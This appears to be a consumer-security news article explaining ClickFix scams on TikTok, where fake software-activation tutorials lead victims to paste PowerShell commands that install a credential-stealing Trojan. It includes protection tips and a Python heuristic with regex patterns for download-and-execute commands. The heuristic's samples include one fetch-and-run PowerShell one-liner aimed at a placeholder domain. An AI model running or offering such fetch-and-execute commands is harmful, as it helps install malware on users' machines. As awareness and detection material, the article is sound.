If a TikTok 'tech tip' tells you to paste code, it's a scam. Here's what's really happening

TikTok has become a popular platform for spreading malicious information and malware, with free software serving as the bait. According to Senior ISC Handler Xavier Mertens, who recently warned about this trend on the SANS Institute's Internet Storm Center website, TikTok is being exploited by threat actors to spread ClickFix social engineering techniques.

ClickFix is a particularly nasty social engineering technique that tries to bypass traditional anti-phishing protections by tricking users into "hacking" themselves. This method uses clever instructions and fake tutorials to convince victims to download malware onto their systems. In the case of TikTok, scammers are using the platform to promote fake tech tips and tutorials that promise easy ways to activate popular software like Photoshop or Microsoft Windows without a license.

In one example posted by Mertens, a scammer claims to provide an easy way to activate Photoshop for free. The victim is asked to start PowerShell as an administrator and run one line of code, which then executes "Updater.exe," a Trojan designed to steal credentials and system information. Additional shellcode is also launched in memory.

ZDNET explored TikTok for similar videos and was surprised by how many were live. For instance, we found a screenshot promoting a fake way to download and install Adobe Photoshop without the need for a license. Other examples included fake, free ways to license Microsoft Windows.

ClickFix is not a new tactic, but it's becoming increasingly popular as a method of infiltrating networks, stealing data, and deploying malware. According to Microsoft's latest Digital Defense report, ClickFix tactics have been recorded as a method of initial access in 47% of attacks since 2024, ahead of phishing and password "spray and pray" attack methods.

So, how can you protect yourself against ClickFix attacks? The first step is to be cautious when executing commands on your device. If you're unsure about the source of the code or its true purpose, especially if you find it on social media where it's unlikely to be vetted, don't execute it.

Additionally, stay suspicious and educate yourself and others about this social engineering method. Share information with friends and family, and encourage them to do the same. By being aware of ClickFix tactics and taking necessary precautions, you can significantly reduce your risk of falling victim to these attacks.

How ClickFix works

ClickFix is a type of social engineering attack that uses clever instructions and fake tutorials to convince victims to download malware onto their systems. The attack typically involves the following steps:

  • Scammers create fake tutorials or videos that promise easy ways to activate popular software, such as Photoshop or Microsoft Windows.
  • The tutorials provide step-by-step instructions on how to "fix" a minor technical glitch or use paid software for free.
  • The victim is asked to execute a command on their device, such as copying and pasting a snippet of code into a command prompt.
  • The malicious payload is deployed and executed, which can include information stealers, Remote Access Trojans (RATs), ransomware, and worms.

By understanding how ClickFix works, you can take steps to protect yourself against these attacks.
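
The steps above all lead to one pasted command that fetches something from the internet and runs it. As an added example (not from the original article or from Mertens' post), the Python heuristic below flags that shape in a command before anyone runs it; the indicator patterns, the `assess` function and the sample commands are constructed assumptions, and the pattern list is not exhaustive.

```python
import re

# Heuristic indicators for a pasted one-liner (assumed patterns, not a complete list).
INDICATORS = {
    # A download cmdlet/tool followed somewhere later by a URL.
    "fetches remote content": re.compile(
        r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|curl|wget|"
        r"downloadstring|downloadfile|start-bitstransfer)\b.*https?://", re.I | re.S),
    # Something that runs text as code or launches a program.
    "executes code or a binary": re.compile(
        r"\b(iex|invoke-expression|start-process|mshta|rundll32|regsvr32)\b", re.I),
    # Hidden window or encoded payload: the user cannot see what runs.
    "hides or encodes itself": re.compile(
        r"-w(indowstyle)?\s+hidden|frombase64string|\s-e(nc\w*)?\s+[a-z0-9+/=]{16,}", re.I),
}


def assess(command: str) -> tuple[str, list[str]]:
    """Return (verdict, matched indicator names) for one command line."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(command)]
    # Download plus execute in the same line is the ClickFix shape described above.
    if "fetches remote content" in hits and "executes code or a binary" in hits:
        return "do-not-run", hits
    return ("review" if hits else "no-indicators"), hits


# Constructed sample inputs; example.invalid is a reserved, non-resolving domain.
SAMPLES = [
    "irm https://example.invalid/activate | iex",
    "Invoke-WebRequest https://example.invalid/readme.txt -OutFile readme.txt",
    'powershell -w hidden -c "Get-Date"',
    r"Get-ChildItem C:\Users -Recurse",
]

if __name__ == "__main__":
    for cmd in SAMPLES:
        verdict, reasons = assess(cmd)
        print(f"{verdict:14} {cmd}  {reasons}")
```

A "no-indicators" result only means none of these patterns matched; it does not show that a command is safe.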

How to protect yourself against ClickFix attacks

Here are some tips to help you protect yourself against ClickFix attacks:

  • Be cautious when executing commands on your device. If you're unsure about the source of the code or its true purpose, especially if it comes from social media, don't execute it.
  • Don't execute a command on your device if you can't verify that it is legitimate.
  • Keep your software up to date, including operating systems, browsers, and antivirus programs.
  • Use strong passwords and enable two-factor authentication whenever possible.
  • Back up your important data regularly to prevent loss in case of a ransomware attack.

By following these tips and staying informed about ClickFix tactics, you can significantly reduce your risk of falling victim to these attacks.